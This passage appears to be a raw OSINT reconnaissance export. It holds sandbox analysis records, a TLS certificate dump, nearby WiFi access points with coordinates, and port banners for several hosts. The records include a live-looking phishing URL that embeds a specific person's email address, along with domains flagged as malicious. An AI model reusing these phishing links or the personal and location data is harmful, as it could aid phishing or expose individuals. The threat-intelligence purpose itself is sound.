"34.148.97.127:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"favicon.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1705.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "Cab1704.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "RG184DMB.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RG184DMB.txt]- [targetUID: 00000000-00003956]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003956]\n "~DF8145DA2F49859598.TMP" has type "data"- Location: [%TEMP%\\~DF8145DA2F49859598.TMP]- [targetUID: 00000000-00002648]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002648]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003956]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003956]\n "~DF7BCFBE90A6F894E5.TMP" has type "data"- Location: [%TEMP%\\~DF7BCFBE90A6F894E5.TMP]- [targetUID: 00000000-00002648]\n "41F80EAD174A0E782E6E1DBBE6C32CE8" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\41F80EAD174A0E782E6E1DBBE6C32CE8]- [targetUID: 00000000-00003956]\n "ETLUKWGX.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ETLUKWGX.txt]- [targetUID: 00000000-00002648]\n "~DF42B58D4878F8FC5E.TMP" has type "data"- Location: [%TEMP%\\~DF42B58D4878F8FC5E.TMP]- [targetUID: 00000000-00002648]\n "Tar1705.tmp" has type "data"- Location: [%TEMP%\\Tar1705.tmp]- [targetUID: 00000000-00003956]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "YU3Y19RW.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YU3Y19RW.txt]- [targetUID: 00000000-00002648]\n "_0571D1C5-1D1B-11ED-A31E-080027B82EA8_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00002648]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: favicon.io"- [Source: SSL_34.148.97.127]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://favicon.io/"- [Source: Input]\n Pattern match: "http://favicon.io"- [Source: Input]\n Heuristic match: "favicon.io"- [Source: PCAP]\n Heuristic match: "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: favicon.io"- [Source: SSL_34.148.97.127]'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/93 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "34.148.97.127": ...\n\n URL: http://goldownloads.netlify.app/ (AV positives: 9/88 scanned on 08/16/2022 05:52:09)\n URL: https://legendaryrsps.com/ (AV positives: 1/88 scanned on 08/16/2022 04:34:51)\n URL: http://homeadvice.online/ (AV positives: 1/88 scanned on 08/16/2022 04:01:22)\n URL: http://fomotracker.xyz/ (AV positives: 1/88 scanned on 08/16/2022 03:18:58)\n URL: https://support-dapps.info/ (AV positives: 15/88 scanned on 08/16/2022 03:03:31)\n File SHA256: 524180810d0b9764e5ef3923a8eb34b2ed8ca1923244be37e94ca57d889ede9b (AV positives: 56/75 scanned on 08/12/2022 02:05:05)\n File SHA256: 782eda6bdf7c6cb6067637f06c9a69c3fda5e4d6efbf7a744bc1b7574311d6ca (AV positives: 26/75 scanned on 07/31/2022 23:13:31)\n File SHA256: 53b6bcc44935e6141356b24f7e68b4970457269119a206c0a0b5d731f2e556d4 (AV positives: 6/74 scanned on 07/31/2022 22:52:37)\n | 34.148.97.127 |
| 2023-05-12 02:44:39 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | tiktok.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:b3:d3:7f:a8:50:41:aa:70:38:c6:ab:16:2e:24:50:f9:66
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 29 13:55:16 2022 GMT
Not After : Mar 29 13:55:15 2023 GMT
Subject: CN=tiktok.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:tiktok.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77:
15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13
Timestamp : Dec 29 14:55:17.050 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:28:6D:42:8E:49:9E:0C:06:C1:19:32:87:
BF:75:CE:80:8F:D6:EA:C5:3B:07:D6:4C:75:42:82:B7:
AF:11:51:87:02:21:00:AE:B6:AE:63:CB:FF:A9:BC:83:
A0:CB:D1:C6:02:EE:7B:8C:98:F1:37:20:95:B3:3D:3B:
1D:2E:39:2F:06:AF:D5
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 29 14:55:17.019 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:D9:21:B2:7A:EF:D8:EF:8A:6A:56:47:
07:FC:9B:67:B8:AE:3E:10:F9:AF:08:C7:4F:19:35:0D:
C5:86:2C:A0:FC:02:20:23:BD:B1:50:ED:06:FD:32:BC:
AE:E7:5A:20:25:B5:AF:2F:31:CA:1D:81:02:1B:A1:2C:
F3:DE:98:F2:29:F5:42
Signature Algorithm: sha256WithRSAEncryption
69:a8:61:13:18:01:a6:06:e2:eb:7a:7f:50:95:06:92:17:8d:
ca:63:d6:69:98:12:cf:b0:fa:ee:80:84:43:ff:f7:1f:35:fe:
72:06:36:88:ae:e4:77:27:a1:93:d1:eb:02:37:43:a8:e0:86:
61:58:2f:fd:b8:58:c4:fe:4d:1e:e7:cc:96:cf:0a:d5:16:48:
9f:46:b8:50:28:e1:ed:1e:1c:e8:de:90:ce:fd:33:bc:3a:3f:
eb:8c:75:a9:62:13:f7:4f:2b:08:b6:ff:b0:a0:90:34:79:dc:
8f:45:7a:05:74:fa:fc:67:dc:64:6a:b8:82:b5:d8:15:dc:e6:
30:a1:47:0a:e3:0b:70:53:63:1c:e4:bd:93:48:f8:f8:a9:29:
47:b8:8c:e0:2a:aa:34:51:c8:15:63:92:48:e4:5c:09:73:8c:
34:26:6a:c2:dd:6d:88:c9:62:37:c7:07:7b:a7:cb:0b:65:95:
3b:9c:ec:a8:8e:63:0a:23:39:ab:20:1d:fa:d0:19:f8:cd:6c:
5b:28:00:57:e4:27:6a:d2:8b:10:68:0f:2e:76:30:48:41:7b:
10:5a:d6:74:99:4a:28:13:dc:83:45:4c:b2:5e:dd:bc:a4:73:
29:47:2c:b2:ad:19:c4:e8:3c:a6:e9:8a:06:b9:d6:a7:ca:fd:
6d:cd:fb:dd
|
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Rick (Net ID: 00:0F:B5:14:80:C2) | 50.8897, 6.0563 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Clementine (Net ID: 00:02:2D:39:EC:00) | 37.7642, -122.3993 |
| 2023-05-12 03:32:08 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.5:443 | 188.114.97.0/24 |
| 2023-05-12 02:54:49 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 20, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fmm.britishcouncil.org%2Fmonmon.myat%40mm.britishcouncil.org', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:3948:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3948:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "Local\\SM0:7384:304:WilStaging_02"\n "Local\\SM0:7384:120:WilError_01"\n "InternetShortcutMutex"\n "SM0:7384:120:WilError_01"\n "SM0:7384:304:WilStaging_02"\n "Local\\SM0:3948:304:WilStaging_02"\n "SM0:3948:120:WilError_01"\n "Local\\SM0:3948:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "SM0:3948:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:3948:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3948:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "172.66.40.106:443"\n "185.88.152.184:443"\n "35.186.254.174:443"\n "104.18.10.207:443"\n "142.250.189.228:443"\n "104.26.9.175:443"\n "172.217.12.99:443"\n "142.251.214.131:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.salesflare.com"\n "rabetsanatkoosha.com"\n "stackpath.bootstrapcdn.com"\n "track.salesflare.com"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"4e051b49-59db-4540-8b2e-31bf0ff2c4be.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\4e051b49-59db-4540-8b2e-31bf0ff2c4be.tmp]- [targetUID: 00000000-00003948]\n "Session_13322826248083631" has type "data"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00003948]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00003948]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003948]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\3948_1394555003\\edge_checkout_page_validator.js]- [targetUID: 00000000-00003948]\n "f_00023d" has type "gzip compressed data max compression original size modulo 2^32 411849"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00003912]\n "d632ab85-22c5-4d58-aa3b-6f1d5e994f5f.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\d632ab85-22c5-4d58-aa3b-6f1d5e994f5f.tmp]- [targetUID: 00000000-00003948]\n "7ae86b14-961b-4af0-b1f5-83780632a832.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\7ae86b14-961b-4af0-b1f5-83780632a832.tmp]- [targetUID: 00000000-00003948]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\3948_931751445\\Filtering Rules]- [targetUID: 00000000-00003948]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00003948]\n "Tabs_13322826250079073" has type "data"- [targetUID: N/A]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00003948]\n "f34135bd94e6cca1_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\f34135bd94e6cca1_0]- [targetUID: 00000000-00003948]\n "1ccf603e-eda4-4df8-bba2-0e7bfd009569.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\1ccf603e-eda4-4df8-bba2-0e7bfd009569.tmp]- [targetUID: 00000000-00003948]\n "edge_autofill_field_data.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Autofill\\3.0.0.4\\edge_autofill_field_data.json]- [targetUID: 00000000-00003948]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00003948]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\3948_1394555003\\auto_open_controller.js]- [targetUID: 00000000-00003948]\n "ce116d68-26b8-44ed-a9db-e5a854af5c79.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ce116d68-26b8-44ed-a9db-e5a854af5c79.tmp]- [targetUID: 00000000-00003948]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgePushStorageWithConnectTokens\\LOG]- [targetUID: 00000000-00003948]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://easylist.to/"\n Pattern match: "https://github.com/easylist"\n Pattern match: "https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fmm.britishcouncil.org%2Fmonmon.myat%40mm.britishcouncil.org"\n Pattern match: "Math.PI/180"\n Heuristic match: "api.salesflare.com"\n Pattern match: "https://creativecommons.org/"\n Pattern match: "https://llink.to"\n Pattern match: "https://rabetsanatkoosha.com/SNS/site.php"\n Pattern match: "https://creativecommons.org/compatiblelicenses"\n Heuristic match: "rabetsanatkoosha.com"\n Heuristic match: "stackpath.bootstrapcdn.com"\n Heuristic match: "track.salesflare.com"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://*excel.officeapps.live.com/*,https://*onenote.officeapps.live.com/*,https://*powerpoint.officeapps.live.com/*,https://*word-edit.officeapps.live.com/*,https://*excel.partner.officewebapps.cn/*,https://*onenote.partner.officewebapps.cn/*,"\n Pattern match: "https://idsync.rlcdn.com,supports_spdy:true},{isolation:[],server:https://pippio.com,supports_spdy:true},{isolation:[],server:https://assets.msn.com,supports_spdy:true},{isolation:[],server:https://ntp.msn.com,supports_spdy:true}"\n Heuristic match: "PATHEXT=.COM;.EXE;.BAT;.CM"\n Heuristic match: "ishcouncil.org%2Fmonmon.myat%40mm.britishcouncil.org"\n Pattern match: "llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fmm.britishcouncil.org%2Fmonmon.myat%40mm.britishcouncil.org"\n Heuristic match: "ouncil.org"\n Heuristic match: "link.to"\n Heuristic match: "u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fmm.britishcouncil.org%2Fmonmon.myat%40mm.britishcouncil.org"\n Pattern match: "https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fmm.brit"\n Pattern match: "https://llx"\n Heuristic match: "api.ipify.org"\n Heuristic match: "checkip.amazonaws.com"\n Heuristic match: "checkip.dyndns.com"\n Heuristic match: "checkip.dyndns.org"\n Heuristic match: "checkip.org"\n Heuristic match: "checkmyip.com"\n Heuristic match: "cmyip.com"\n Heuristic match: "curlmyip.com"\n Heuristic match: "findmyip.org"\n Heuristic match: "formyip.com"\n Heuristic match: "geoip.co.uk"\n Heuristic match: "geoiptool.com"\n Heuristic match: "getmyip.co.uk"\n Heuristic match: "getmyip.org"\n Heuristic match: "icanhazip.com"\n Heuristic match: "ifconfig.me"\n Heuristic match: "ip-addr.es"\n Heuristic match: "ip-address.domaintools.com"\n Heuristic match: "ip-api.com"\n Heuristic match: "ip-score.com"\n Heuristic match: "ip.jsontest.com"\n Heuristic match: "ip.xss.ru"\n Heuristic match: "ip4.telize.com"\n Heuristic match: "ipchicken.com"\n Heuristic match: "ipecho.net"\n Heuristic match: "ipinfo.info"\n Heuristic match: "ipinfo.io"\n Heuristic match: "ipleak.net"\n Heuristic match: "ipligence.com"\n Heuristic match: "knowmyip.com"\n Heuristic match: "maxmind.com"\n Heuristic match: "meineipadresse.de"\n Heuristic match: "myexternalip.com"\n Heuristic match: "myip.dnsomatic.com"\n Heuristic match: "myip.ht"\n Heuristic match: "myip.nl"\n Heuristic | 185.199.109.153 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 1 | 2 | 0 | None | 220-cp.keyubu.net ESMTP Exim 4.95 #2 Thu, 11 May 2023 00:03:02 +0300
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
| 87.248.157.102 |
| 2023-05-12 03:09:35 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 216.30.196.104.bc.googleusercontent.com | 104.196.30.216 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | sflan47b (Net ID: 00:02:6F:08:22:03) | 37.7642, -122.3993 |
| 2023-05-12 02:45:56 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://angryip.org/download/#windows', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_8b8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_8b8_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_8b8_IESQMMUTEX_0_519"\n "IsoScope_8b8_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "IsoScope_8b8_IE_EarlyTabStart_0xdb4_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2232"\n "IsoScope_8b8_ConnHashTable<2232>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "142.250.189.226:443"\n "142.251.46.226:443"\n "142.251.32.33:443"\n "74.125.137.157:443"\n "142.251.32.34:443"\n "142.250.189.195:443"\n "142.250.191.42:443"\n "172.217.12.99:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"angryip.org"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "googleads.g.doubleclick.net"\n "pagead2.googlesyndication.com"\n "partner.googleadservices.com"\n "stats.g.doubleclick.net"\n "tpc.googlesyndication.com"\n "www.googletagservices.com"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"function Hn(a){switch(a){case "true":return!0;case "false":return!1;case "null":return null;case "undefined":break;default:try{var b=a.match(/^(?:\'(.*)\'|"(.*)")$/);if(b)return b[1]||b[2]||"";if(/^[-+]?\\d*(\\.\\d+)?$/.test(a)){var c=parseFloat(a);return c===c?c:void 0}}catch(d){}}};function In(a){if(a.google_ad_client)return String(a.google_ad_client);var 